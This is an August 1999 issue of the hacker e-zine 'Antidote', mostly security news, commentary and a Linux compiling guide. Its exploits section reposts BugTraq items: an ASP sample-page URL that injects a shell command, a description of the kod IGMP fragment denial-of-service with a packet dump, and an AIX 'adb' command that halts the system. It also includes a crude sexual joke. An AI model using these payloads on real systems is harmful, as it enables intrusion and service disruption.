Volume 2 Issue 13 8/19/99 ** ** ***** * * ** * * *** ** *** ** ** *** ** * ** ** * ** ******** ** **** ******** * ** *** **** ******** *** *** ** * *** * ******** *** * ** **** **** * ** *** ********* * **** ** * *** * ** ** **** ** ** ** **** ** ** ** * *** * ** ** ** ** ** ** ** ** ** ** ** *** ********* ** ** ** ** ** ** ** ** ** ******** * ** ** ** ** ** ** ** ** ** ** ******* * ** ** ** ** ** ** ** ** ** ** ** ***** ** ** ** ** * ** ** ** ****** ** **** * * **** ** * *** *** ** *** * ***** **** ** ******* * ** ** *** *** *** *** ***** * ** http://www.thepoison.org/antidote bof_ptr = (long *)buffer; for (i = 0; i < bufsize - 4; i += 4) *(bof_ptr++) = get_sp() - offs; printf ("Creating termcap f1le\n"); printf ("b1tch is Fe3lyn 1t.\n"; ------------------------------ In this issue of Antidote, we have over 690 subscribers and getting more everyday! The only thing that we ask of you when you read Antidote, is that you go to: www.thepoison.org/popup.html and click on our sponsors. One issue of Antidote takes us about a week to put together and going to our sponsor only takes you about 15 seconds (if that). So please go visit our sponsor because it is the only thing we ask of you. -)!-- Contents //--(- 0.0 - Beginning 0.01 - What? 0.02 - FAQ 0.03 - Authors 0.04 - Shouts 0.05 - Writing 1.00 - News 1.01 - Chinese Engineer accused of posting Secrets Online 1.02 - More on PacketStorm 1.03 - Mitnick Sentancing postponed Again 1.04 - CD-PROM: Anti-warez Hardware 1.05 - House says info not aimed at US 1.06 - Use encryption, go to jail? 1.07 - Hole opens Office 97 users to Hijack 2.00 - Exploits (new & older) 2.01 - ODBC.asp.sample_page.txt 2.02 - more.info_on.kod.c.txt 2.03 - local.halt.aix.txt 3.00 - Misc 3.01 - Statement by OptikLenz 3.02 - Compiling Linux Source Code SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just plane making fun of something or someone. FEAT.S - FEATURED SITES: http://browse.thepoison.org www.403-security.org www.hackernews.com ------------------------------ -)!-- 0.00 - Beginning //--(- 0.01 --=\\What?\\=-- What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on there hands and are bored with nothing to do. If you want to read a maga- zine that teaches you how to hack etc, then you might want to go to your local book- store and see if they carry '2600'. ------------------------------ 0.02 --=\\FAQ\\=-- Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions and if the question isn't on here or doesn't make sense, then you can e-mail us with your question. > What exactly is "Antidote"? See section 0.01 for a complete description. > I find Antidote to not be shot for the beginner or does not teach you the basics, why is that? Antidote is for everyone, all we are basically is a news ezine that comes out once a week with the current news, exploits, flaws and even programming. All of the articles that are in here are recieved second hand (sent to us) and we very rarely edit anyone's articles. > I just found Antidote issues on your webpage, is there anyway I can get them sent to me through e-mail? Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will recieve a link to the current Antidote (where you can view it). > If I want to submit something, are there any 'rules'? Please see section 0.03 for a complete description. > If I submitted something, can I remain anonymous? Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say. > I submitted something and I didn't see it in the current/last issue, why is that? It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e- mails no matter what). We might use your article in future issues off Antidote. > Can I submit something that I didn't "discover" or "write"? Yes you can, we take information that is written by anyone regardless if you wrote it or not. Well thats it for our FAQ. If you have a question that is not on here or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month. ------------------------------ 0.03 --=\\Authors\\=-- Lord Oak is the founder and current president of Antidote. Most work is done by him. Please feel free to e-mail him at: lordoak@thepoison.org Duece is the co-founder and co-president of Antidote, some work is done by him when he comes online. Feel free to e-mail him at: duece@thepoison.org ox1dation not really an author, just someone that helps us out a lot and we consider him as an author! His e-mail address is: ox1dation@thepoison.org ------------------------------ 0.04 --=\\Shouts\\=-- These are just some shout outs that we feel we owe to some people. Some are individuals and Some are groups in general. If you are not on this list and you feel that For some reason you should be, then please contact Lord Oak and he will post you on here and we are sorry for the Misunderstanding. Well, here are the shout outs: Lord Oak EazyMoney Duece opt1mus oX1dation PBBSER Forlorn Retribution 0dnek www.thepoison.org Like we said above, if we forgot you and/or you think you should be added, please e- mail lordoak@thepoison.org and he will be sure to add you. ------------------------------ 0.05 --=\\Writing\\=-- As many of you know, we are always open to articles/submittings. We will take almost anything that has to do with computer security. This leaves you open for: -Protecting the system (security/securing) -Attacking the system (hacking, exploits, flaws, etc....) -UNIX (really anything to do with it...) -News that has to do with any of the above.... The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please note that if we recieve two e-mails with the same topic/idea then we will use the one that we recieved first. So it might be a good idea to e-mail one of us and ask us if someone has written about/on this topic so that way you don't waste your time on writing something that won't be published. An example of this would be: If Joe sends me an e-mail with the topic being on hacking hotmail accounts on thursday. And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue! If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it). ------------------------------ -)!-- 1.00 - News //--(- 1.01 --=\\Chinese Engineer accused of posting Secrets Online\\=-- [www.nandotimes.com] A Chinese engineer has been arrested on charges of posting secrets about a new warplane to an Internet bulletin board, a newspaper reported Wednesday. Authorities tracked down the engineer after the article posted in May spread to other Internet sites, the state-run China Business Times reported. The newspaper identified the engineer only by his surname, Guo. The article he published allegedly touched on secrets about a new fighter plane that he learned about while working at a research institute in the southwestern city of Cheng- du, the newspaper said. The newspaper alleged that Guo posted the article to show off a specialist's knowledge of military affairs. Prosecutors in Chengdu decided a few days ago to arrest Guo on charges of leaking state secrets, the newspaper said. http://www.nandotimes.com/technology/story/0,1643,72624-114802-815595-0,00.html ------------------------------ 1.02 --=\\More on PacketStorm\\=-- hey, i've been working very hard with numerous corporate entities to try to get the web site back up and online as soon as possible. everything is looking very good now, and i hope to have the site back up and better than ever RSN (Real Soon Now). hopefully, the site will be run and hosted by a professional security firm (to be named at the appropriate time), and the new site will be more professionally maintained by a full staff of security experts, administrators, and web designers. with a very substantial amount of corporate funding, the new Packet Storm Security will be a completely revamped site with more features, more updates, more bandwidth, more of everything. news and updates will be posted here as soon as i get confirmation of the new plans, and contracts are signed. Ken Williams ------------------------------ 1.03 --=\\Mitnick Sentancing postponed Again\\=-- [www.zdnet.com] The sentencing of convicted hacker Kevin Mitnick was postponed for a second time today. The government is asking for Mitnick to be responsible for restitution on the order of $1.5 million, while the defense is asking for payments on the order of $5,000, based on his projected earnings potential during his supervised release. He will not be able to use a computer during that three year-period http://www.zdnet.com/zdnn/filters/bursts/0,3422,2302198,00.html ------------------------------ 1.04 --=\\CD-PROM: Anti-warez Hardware\\=-- [www.expressnews.com] Software pirates have a new technological hurdle ahead of them. Kodak has developed a way to make CD programs more secure from hackers and unlicensed users. It's a customized CD called the CD-PROM (Compact Disc-Programmable ROM). This includes the standard write-once feature of commercial software, but the CD-PROM also includes a recordable feature that identifies a particular computer to the CD. "There's a lot of enthusiasm for this technology," said Bruce Ha, senior research asso- ciate at the Eastman Kodak Co. of Rochester, N.Y. "It's a format that people have been talking about for the past 10 years now." The new hybrid technology allows software manufacturers to produce low-cost CD-ROMs with the ability to add CD-R (recordable) information. CD-PROM works like a normal CD software product, but using the software requires start-up information specific to the licensed consumer. For instance, many software CDs require a registration code to unlock some or all of the program's features. To get the registration code, consumers can register their software online with the software manufacturer. To thwart Internet hackers, the CD-PROM will match the registration code with the licensed software, thus keeping hackers from using an illegal copy of the software. Similarly, a CD-PROM is designed to work on software shipped with a specific computer. The CD-PROM can be set up to read only the BIOS information on the computer with which it was shipped. The BIOS (basic input/output system) loads and executes the computer's operating system, such as Windows 98. "So (Microsoft) Office or any other program that comes bundled with that computer can- not be shared by anyone else," Ha said. But making a CD-PROM has been difficult. A normal CD contains data embedded into "pits" that are pressed into the platter. The platter is then covered by an aluminum reflective layer and a protective plastic coat- ing. On a CD-R, a single groove is pressed into the platter instead of pits. An organic dye is added for recording new information onto the platter. A reflective layer of gold or silver covers the dye, and then the CD gets a protective coating. Some manufacturers have tried to add both pits and grooves onto a CD. But they have had problems with the disc being read properly. This can occur when the ROM reader switches to the recordable writer, or because the speed of the laser light reading the CD chang- es when it goes through different materials on the platter. To get around this, Kodak decided to use a single, continuous groove pressed into the platter. The master disc is designed to make the CD reader think that the groove actu- ally contains a series of pits. Kodak is using the CD-PROM for its Picture CD product. Ha says no failures have been noticed after beta testing 20,000 discs in photo labs. http://www.expressnews.com/pantheon/news-bus/sheron-tech/2504rkodak_7-25nz.shtml ------------------------------ 1.05 --=\\House says info not aimed at US\\=-- [www.washtimes.com] White House spokesman David Leavy on Thursday adamantly denied a new International Pub- lic Information (IPI) system would be directed at American audiences. IPI is a secret Clinton administration program to control public information dissemina- ted by the departments of State and Defense and intelligence agencies. It is meant to "influence foreign audiences in a way favorable to the achievement of U.S. foreign-policy objectives," according to a draft IPI charter obtained by The Wash- ington Times. "That is totally inaccurate," Mr. Leavy said. "The IPI initiative is designed to better organize the government and the instruments we have to support our public diplomacy, military activities and economic engagement overseas. There is no impact on the domes- tic press." Mr. Leavy said that U.S. information officials at home and abroad serve different func- tions. "There are officers who work with the media in the United States and officers who sup- port the U.S. policy overseas. They are totally separate. They are totally different functions," Mr. Leavy said. But a former deputy chief of the U.S. Information Agency (USIA) under three presidents said he fears the IPI plan would mean U.S. propaganda aimed at foreigners would be used to influence American elections. Gene Kopp, who served under Presidents Nixon, Ford and Bush, said the elections of President Kennedy and President Carter were directly influenced by leaks of USIA for- eign public-opinion polls showing a decline in U.S. prestige abroad. "I am concerned this could happen again under the IPI plan," said Mr. Kopp, currently a Washington lawyer. "The administration is transferring all assets, except broadcasting, to State, where they will not be separated in any way. It will be very difficult to separate what is disseminated in the United States and overseas." He said that the opportunity for abusing the system will be great. "The temptation to spin this stuff in a partisan way will be very strong -- probably irresistible," he said. "The other ominous feature is that this includes the intelli- gence agencies. They are in the business of misinformation. God only knows where that goes." New allegations emerged Thursday that the Clinton administration has been trying to control how American news organizations cover foreign affairs, at least since the Bos- nia peacekeeping mission in 1996. According to a former government official, who insisted on anonymity, the White House created a Strategic Planning Directorate, which used the State Department and USIA to pressure American reporters into favorable coverage of the U.S. troop deployment in Bosnia-Herzegovina. It came into being just prior to the 1996 presidential election. "I heard them talk about it in conference telephone calls --how they had to control the media out there, the bureau chiefs, because if the Republicans picked this up [the Clinton administration] would be exposed as having no foreign policy," said the former government official. Shortly after President Clinton won re-election in 1996, the administration announced that U.S. troops would not be home by Christmas, as promised. Today, nearly three years later, some 7,000 U.S. troops remain in Bosnia. "The U.S. public wanted to know how long American troops had to be there," said the ex- official. "The Clinton people said 'only one year,' and [that] they would be home in December, after the election. But everyone knew the only way to keep the warring sides apart was robust international and American presence." This former official said this was widely discussed. "In the conference calls, they openly discussed how they had to prevent American jour- nalists from discussing this," he said. The source said that USIA officials and National Security Adviser Samuel R. Berger tried to convince American editors not to publish accounts by their reporters who wrote that Bosnia was unsafe for Americans, that Muslim extremists were a threat, and that the warring sides would never be pacified. Ivo Daalder, who was a staffer on the National Security Council at the time, said dis- cussions had no ulterior motives. Mr. Daalder, who is now at the Brookings Institution, said the talks among the USIA, National Security Council and other agencies "had the sole purpose of making sure they share information among them, and when the U.S. government speaks to the outside world, it does so in a coordinated manner." Mr. Daalder said "there was no deliberate campaign designed to put out false informa- tion prior to the 1996 presidential election." He said that USIA did increase staffing and efforts to convince American reporters in Bosnia of the administration's perspective in September, prior to the Bosnian elec- tions. http://www.washtimes.com/news/news3.html ------------------------------ 1.06 --=\\Use encryption, go to jail?\\=-- [www.cnn.com] Encryption users could face up to two years in prison for refusing to hand over the keys to their code, according to Britain's proposed Electronic Communications Bill. The bill is causing concern among privacy advocates and opposition parties, who say the bill gives law enforcement wide-reaching power over private Internet communications. Most aggravating, the bill calls for a possible two years in prison for anyone refusing to turn over the encryption key or the message in plain text to law-enforcement offic- ials. It also calls for a five-year prison term for tipping off senders that they are being investigated, according to Caspar Bowden, director of the London-based Foundation for Information Policy Research. Even discussing an investigation in public, such as complaining about alleged abuses of law enforcement to the media, may also be punishable by imprisonment, said Bowden. "Let's say that someone under investigation sends me a message with encryption that can only be decrypted by the receiver. The authorities come to me and tell me that they are investigating someone, but won't tell me who, so they ask for all my private keys," Bowden said. Refusing this request from the authorities could get him two years in pri- son, said Bowden. In such a case, the authorities would have all of Bowden's private keys, enabling law enforcement to read all encrypted correspondence that was sent to him. Bowden would then have no choice, he said, because by informing anyone of this, and asking them to change their key, he would break the "tipping off" clause of the bill and in turn and face five years imprisonment. "I can't complain to the newspaper, otherwise it's five years in jail. All I can do is go to a secret tribunal," Bowden said. He's not joking: The tribunal is five judges, on y two have to participate, and only one has to lay the groundwork, he added. Bowden feels that the entire bill needs to be re-examined by the U.K.'s Department of Trade and Industry. "We would like to see the Electronic Communication Bill be about e- ommerce, which is what they said; the law-enforcement section doesn't even belong in it" he added. There is also another method of hiding messages, called steganography. It's not really clear to commentators such as Bowden whether or not steganography is covered by the bill. With steganography, users can "sprinkle an encrypted message" into a photographic format, such as JPEG, or a music format such as MP3, both of which are very popular online. In actuality, the message does not necessarily need to be encrypted, just con- ealed within the file, according to Bowden. Although the bill does not mention technologies such as steganography, Bowden specula- ed that the authorities could enforce regulations in those cases by proving that there was a reason to search, such as the existence of a steganography program on the sus- ects computer. http://www.cnn.com/TECH/computing/9907/29/ukencrypt.idg/index.html ------------------------------ 1.07 --=\\Hole opens Office 97 users to Hijack\\=-- [www.msnbc.com] THE VULNERABILITY IS CONTAINED in the Jet 3.51 driver (ODBCJT32.DLL) that was shipped with the popular Office 97 software suite. (Microsoft is a partner in MSNBC.) Juan Carlos G. Cuartango, a Spanish Web developer who has discovered other important security holes, reported the problem to the NTBugTraq mailing list Thursday afternoon. Later Thursday, the Microsoft Security Team confirmed the bug in a posting to the same list. “If you open a malicious Excel worksheet implementing this vulnerability it will send shell commands to your operating system (Windows NT, 95 and 98 are all affected) that can: (infect) you (with) a virus, delete your disks, read your files,” Cuartango said in his posting to the list. “…(T)he worksheet will get full control over your machine.” The Microsoft posting said the company is preparing to release a security bulletin dealing with the vulnerability. Shortly before 5 a.m. ET Friday, the bulletin had not appeared on the Microsoft Office Update site or the Microsoft security site. “We’ve verified that this vulnerability in Jet 3.51 does exist, and urge all customers who are using Jet 3.51 to upgrade to Jet 4.0,” the Microsoft mail to NtBugTraq said. “This vulnerability should be taken seriously. Office 97 users in particular should consider immediately upgrading their database driver to Jet 4.0, as Jet 3.51 is install d by default in Office 97. Office 2000 users do not need to upgrade, as Office 2000 in- stalls Jet 4.0 by default.” An Excel worksheet that contains code to take advantage of the vulnerability could be hidden in a frame on a Web page or sent in an e-mail. As long as the worksheet contain- ed no macros, there would be no indication to the user who visited the Web page or op- ened the e-mail that any code had been executed, Cuartango reported. If the file is sent in e-mail, the recipient must be on-line to be affected, Cuartango said. He reco- mmended not opening documents you are not expecting to receive and going off-line be- fore opening e-mail. If the worksheet were instead sent as an attachment to e-mail, the recipient could a- void ill effects by not opening the attachment. To determine whether you are at risk, search your hard drive for a file named ODBCJT32.DLL. When you locate it, right-click on it and hit Properties... If the ver- sion number starts with 3.51, you should upgrade the driver as soon as possible. Microsoft said it would provide detailed instructions for avoiding the problem in its security bulletin. In the meantime, users at risk can avoid the problem by installing Microsoft Data Access Components version 2.1, which contains Jet 4.0. MDAC 2.1 is avai- lable at www.microsoft.com/data/. Cuartango said he reported the vulnerability “a few days ago.” He alleged in is posting that Microsoft was preparing to warn users only because he was taking the issue public. Microsoft denied the allegation. http://www.msnbc.com/news/295385.asp#BODY ------------------------------ -)!-- 2.00 - Exploits //--(- 2.01 --=\\ODBC.asp.sample_page.txt\\=-- To: BugTraq Subject: Yet Another ODBC Bugged ASP Sample Page Author: Wanderley J. Abreu Junior Dear Team, Exploiting ODBC Features that come with your sample programs is not a mistery for any of us. So Let me add one more ASP Sample with similar troubles: http://server/ASPSamp/AdvWorks/equipment/catalog_type.asp or yet http://server/AdvWorks/equipment/catalog_type.asp It lets you execute shell comands like the other scripts. It is a Active Server Page so it runs the query as a local user and doesn't need any type of Remote Data Service to access the DSN. It just require the default DSN (advworks) set. The Exploit command line can be for instance : http://server/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c +dir+c:\")| Sorry if this SERIOUS security failure was already reported. Wanderley Junior ------------------------------ 2.02 --=\\more.info_on.kod.c.txt\\=-- To: BugTraq Subject: more detail and summary of kod.c (igmp bug for windows) Author: klepto Ok, Here we go again.. For those who are having trouble with kod, alot of you are using a very old version which was the first i submitted. inserted is the lastest version which should work. I wrote kod.c aka cherrycoke.c about 3-4 months ago. It sends a fragmented igmp packet to a windows client that states that it is not frag- mented but there are more frags to come windows assembles the packets and dies trying. Here is a dump of the packet if you want to rewrite it. /* output via tcpdump or windump95 63.66.66.44 > 24.128.158.18: igmp-2 [v0][|igmp] (frag 52242:1480@0+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:1480@1480+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:1480@2960+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:1480@4440+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:1480@5920+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:1480@7400+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:1480@8880+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:1480@10360+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:1480@11840+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:1480@13320+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:1480@14800+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:120@16280) (ttl 128) */ ::notice the last frag it changed length.. I have also ported kod to windows and please email me if you want a copy of it. As far as I can tell due to my exaustive research on the subject it works on 95/98/98se/2k(some betas) Friends of mine such as defile/nyt/ignitor/etc have rewritten kod to suit there needs.. I have tested kod.c out alot on many machines and it works 85% of the time for me. There are circumstances to why kod doesn't always work, some routers my drop igmp pack- ets if the source isn't local so try spoofing =). As far as I can see netcom and alot of .ca servers drop the kod packets. So please dont bark at me =) I just found the bug, wrote the code and what you do with it is your concern =). Patch: (no hotfix currently) If you want to protect yourself from kod.c I suggest you get winroute from www.winroute.com get version 4.. It automatically drops igmp packets incoming and out- going ha =) It is also a very good portmapper/NAT firewall/ip masqer as well.. Shoutouts: amputee/ignitor/nizda/antibyte/codelogic/ill`/chord/cheesebal/traveler/winx/naz/dist/ mrcide/etc... (gotta give shoutouts) klepto@Efnet klepto@levitate.net ------------------------------ 2.03 --=\\local.halt.aix.txt\\=-- Local users can halt the operating system by 'adb' command under my AIX box. Here's a simple C program: main() { int i; for ( i = 0; i < 10; i++ ) { } return 0; } I compiled the program and run 'adb': $ cc -g -o a.out a.c $ adb a.out - adb .main,5:s a.out: running Now host halted. AIX 4.2(IBM RS/6000 F50) and AIX 4.3.1(IBM RS/6000 S70) have 'adb' problem. But AIX 4.3.2 haven't the 'adb' problem. I have tested it under my AIX box. Is it bug of AIX 4.2, 4.3.1? GZ Apple gzapple@21cn.com ------------------------------ -)!-- 3.00 - Misc //--(- 3.01 --=\\Statement by OptikLenz\\=-- Something needs to be said... First off... Earlier this year an assembly of organizations decided to release a joint statement "condemning" Legions. This evidently was before any of them contacted Legions request- ing information on what the true plight was. Because of some iniquitous media converage a few people misunderstood our motives. This of course is in regards to the past "China Human Rights incident". We wanted to bring a tragic predicament to surface so other people could speak out as well. The media was misinformed when they reported about our goals to aid these count- ries in their fight for freedom of speech. They (the media) stated we (Legions) wanted to damge certain computer networks in other parts of the world. We wanted to help them with the situation concerning their lack of freedom, and human rights why would we want to destroy or damage their networks the same networks that give them what little free- dom they have to communicate as people. That just makes no sense at all. I ask that the people who joined to make the statement condemning Legions take that into consideration and next time contact us so that we could discuss things, and clear up misunderstand- ings. It's not a funny matter when peoples lives, and reputations are at stake. As hackers the computer has built our lives, and in turn we have built our lives around the computer we would never choose to harm such a valuable resource. The term hacker doesn't discriminate. You can be a federal agent, but the best damn coder in the world and in the sense of the word you'll be a hacker. Bill Gates, a hacker turned billion- aire. Software designers, security specialist the people who help protect your networks these people are hackers. "Information, and data is to be cherished, (for it can only build you not hurt you) cultivated and developed not to be annulled or locked up. Hack- ing is an expansive applied knowledge in any technical field. Destruction, and the un- schooled acts of those who live with out moral are what separates the "hackers" (those who's main purpose of life is to learn, expand, and apply what they learn) from those that go as far as turning the computer on." (-The previous quoted statement was excerp- ted from Keen Veracity 3 www.underzine.com). Something serious is going on at the moment. A string of "attacks" against our own gov- ernment. And till now no one has said anything. The actions of these groups are sin- cerely half-witted, and absurd for it will at the end accomplish nothing except a few more long term jail sentences. The current actions of these self-proclaimed "hackers" have me infuriated. The people DOS'ing government sites, and defacing mil, and gov do- mains, and damaging information these people aren't hackers they are nothing more than unschooled adolescent teens with nothing better on their hands. They are an endanger- ment to the true aspect of computer science dealt with by the hacker community. Call what they are doing what you want, but don't call it "hacking" because it's not. So many articles have surfaced which referred to what these cracker cults are doing as "hacking" ex; "Hackers attack government" - "Hackers strike again" (false) Call them destructive call them by their first name but for the sake of god don't just yank out the term "hackers" for a better story for the sake of god don't defile the name "hacker" for your personal gain. A hacker lives by a strong code of ethics. We wouldn't be issuing this statement if we didn't. A government investigation is currently pending on the above matters If we dont do something about this now the government will surely hold us accountable, and I'm not talking jail time. We have a lot to lose if we dont stop these people from making us look bad. Though we are not affliated with them directly certain mainstream media has left a misleading trail. Some of our rights as computer partisans may be a stake here. With that said I ask that all sites that archive these senseless hacks suspend docu- menting these fatuous acts for the time being. The script kiddies that go out and tar- get government and military servers are media crazy, and you are only adding fuel to their fire by flashing their work to the public. A note to the lamers This is where it ENDS... In the end it's what you choose to do that makes you who you are. So make sure what you choose to do doesn't make you look like an ass. www.hackernews.com/archive/1999/noaa/index.html www.hackernews.com/archive/1999/army/index.html www.hackernews.com/archive/1999/monmouth/index.html www.hackernews.com/archive/1999/argonne/index.html www.hackernews.com/archive/1999/nswcl/index.html www.hackernews.com/archive/1999/senate2/index.html www.hackernews.com/archive/1999/bnl/index.html www.hackernews.com/archive/1999/doi/index.html The above is an archive of recent government, and military site defacements done by what seems to be comparable to the works of 5 year olds... Look at the archived sites, and tell me something doesn't need to be done. Just letting people know we aren't going for their childish actions. We dont advocate any of the trash being done by these uninspired idiots. we're "hackers" the other white meat! ------------------------------ 3.02 --=\\Compiling Linux Source Code\\=-- OK. You're sick of RPMs and those damn big packages. You want to have more access to what goes on when you install a program. Hell, that's why you installed Linux in the first place- to have more control over the operating system. You want to be able to compile source code. Why? There are quite a few benefits to manually compiling source code. One is a program generally runs a lot faster when you compile it yourself. Packages (when I say packages I mean any pre-packaged program- such as Debian's .deb package or RedHat's .rpm package) are usually compiled for the minimal linux will run on- a 386. That's not exactly taking advantage of your processor. I recompiled the kernel for RedHat 5.2 and it ran nearly twice as fast. (Kernel recompilation is another HOWTO article I'll be submitting soon.) Another advantage of compiling yourself is you can pick where most program files go with pre-packaged software it goes where it choos- es, which is not always the best option for a lot of people especially those on net- worked computer that have some form of sysadmin watching over them. One day an admin is scanning the /bin directory for SUID root execs and all of a sudden he sees your rpm copy of KDE sitting there. Yet another advantage of compiling yourself is disk space. If your /usr partition is filling up, for instance, and you'd like to add another par- tition to conserve space (mounted on /usr/home, for example) you could simply setup the program's base directory in /usr/home. This would not be an easy task if you were trying to install a rpm. Source code is also usually smaller it would take a hell of a lot less time to compile something rather than waiting for a big ass binary to down- load. This is why Netscape is so damn big they distribute it precompiled just like most Windows apps. Also most anything for linux that's remotely hacking related you only get source code for. These are the advantages to compiling software yourself. Getting and Decompressing the file Most source code comes compressed- the extension for this is .tar.gz. This means the file was tarred- that means it packed the entire source and data files into one big file- and then it was compressed using gzip. There is another, more efficient method of compression the bzip2 compression method. These files usually end in .tar.bz2. They are usually smaller and take less time to download try and make bz2 files your first choice and tar.gz your second. Some source (usually exploits) aren't compressed at all and simply end in .c or .cpp which means they are plain source. I'll explain more about compiling plain source later. To decompress tar.gz files, use the command 'tar -zxf bob-2.3.tar.gz' (where bob-2.3 is your example file). Tar has the gnu unzipper 'built in'- that is, that will completely decompress the file with one command. Bzip2 files require 2 separate commands 'bunzip2 bob-2.3.tar.bz2' (which 'bunzips' the file) and then you untar it: 'tar -xf bob-2.3.tar' Usually the best place to decompress files in in the /usr/local directory. Unlike Win- dows, Unix has a very well defined directory tree and /usr/local/is the general 'put new shit here' directory. There are others, also, such as just /usr or /home, but this is the one I generally use. If you're only temporarily creating a directory just to compile and are then deleteing this directory, you can pretty much ignore this. But bear in mind some larger programs can't have their compilation directory deleted. Check the docs included for details. Once you have decompressed the file usually there is a directory created which is similar to the filename. In this case, let's say a directory called bob was created in /usr/local. Change directory into your newly created 'bob directory (I hope to god you know how to do this) and take a look around. The first file that should catch your attention is something similar to INSTALL or README. Take a look at this file, beacuse there might be some evironment variables you need to set up or a library needed before the program will run right. By the way.. do this at the con- sole or in an xterm... you can't point and click your way throught this. Usually there are 3 basic commands to compiling unix source code: ./configure which is a shell script that is run to configure the Makefile etc. for your system, make which actually does the compiling, make install which copies the newly created binaries and libraries to various places on your system. Run each of these one at a time, because if you run a command like: ./configure ; make ; make install to do it all at once and you get a screenful of error messages you won't know on which step the error occured. With most programs, after the source has sucessfully compiled, you can change to a higher directory and delete the temporary created one (bob in this case). Take note though some programs don't adhere to this rule (KDE is a good example) be- cause it needs certain data files and directories to run right. If You Get Errors This is the part where you really have to evaluate what's going on- you have to use some (gasp) common sense. If you run ./configure and it complains about lib.qt.so being missing you probably are missing the Qt libraries. Remember, if you are compiling a program you have to have not only the libraries it depends on installed and you're on a package-based system you must also have its devel libraries. In this case, even if you had the qt rpm installed you'd still need the qt-devel rpm installed. If you run ./configure and it complains about a variable not being set, check the IN- STALL or README file and see if it says anything about variables needing to be set on where the program is. Remember, don't just set the variable and try to recompile... you have to put a reference to it in the script that's executed when you log in. Otherwise the variable will be lost when you log out. For example, if you're tryig to compile KDE and it complains about the $KDEDIR variable not being set, you would edit your ~/.bash_profile (if you use the bash shell) and add 'KDEDIR = /usr/local/kde' (w/o the quotes) and also add the word export $KDEDIR at the bottom of the script. If you use tcsh, you need to edit your ~/.tcshrc and add /KDEDIR '/usr/local/kde'/ (w/o the slashes) but you don't have to add an export line at the bottom. Use some common sense, and if it still doesn't compile try and go to the program's web page and take a look at the FAQ or Docs section. Compiling Scripts Files you download that are just simple C or C++ source will have the extension .c , .cpp or .c++ and will usually be just one or two files. They usually have instructions and specific compiler options written in them... take notice of this.Open up the file in your favorite editor and check. If they don't, you should be able to compile them by typing: gcc filename.c -o filename If it's a c++ file, you might have to try something a little different, like c++ filename.cpp -o filename or for C source cc filename.c -o filename The -o means 'output the binary to this file' - this is what you want the binary to be named. Then you should be able to execute it by typing ./filename Some files are shell scripts... they have extensions like .sh or .bash. These you should be able to execute simply by typing bash or just execute it (./file). This is not source code... it's just a script. Well that's about it for this article... remember to RTFM and use your head... don't keep emailing the coder of the program asking for help... this is very annoying and he has other things to do. Keep a look out for the next file I'm writing... recompiling the linux kernel for sec- urity and speed. Keep it real... and don't be lame. Floyd Pinkerton July '99 ------------------------------ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- . Quote #1- . . . . "Good for girl to meet boy in park, better for boy to park meat in girl." . . . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _| _| _| _| _| _| _| Antidote is an HNN Affiliate _| _| http://www.hackernews.com _| _| _| _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission is needed before using.